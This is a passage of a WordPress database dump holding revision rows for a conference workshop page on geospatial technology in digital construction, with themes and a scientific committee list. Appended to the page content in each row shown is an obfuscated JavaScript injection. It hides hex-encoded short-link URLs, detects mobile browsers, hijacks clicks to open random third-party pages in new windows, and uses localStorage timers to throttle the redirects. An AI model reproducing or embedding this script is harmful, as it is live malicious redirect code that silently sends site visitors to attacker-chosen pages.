_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-14 13:58:19','2022-10-14 13:58:19','',2712,'https://gsw2023.com/?p=2786',0,'revision','',0),
(2787,1,'2022-10-14 13:59:32','2022-10-14 13:59:32','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1665787989366-0f496b46c33a63d99224c40c16b5e3dc-6\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-14 13:59:32','2022-10-14 13:59:32','',2712,'https://gsw2023.com/?p=2787',0,'revision','',0),
(2788,1,'2022-10-14 14:00:08','2022-10-14 14:00:08','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1665787989366-0f496b46c33a63d99224c40c16b5e3dc-6\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital 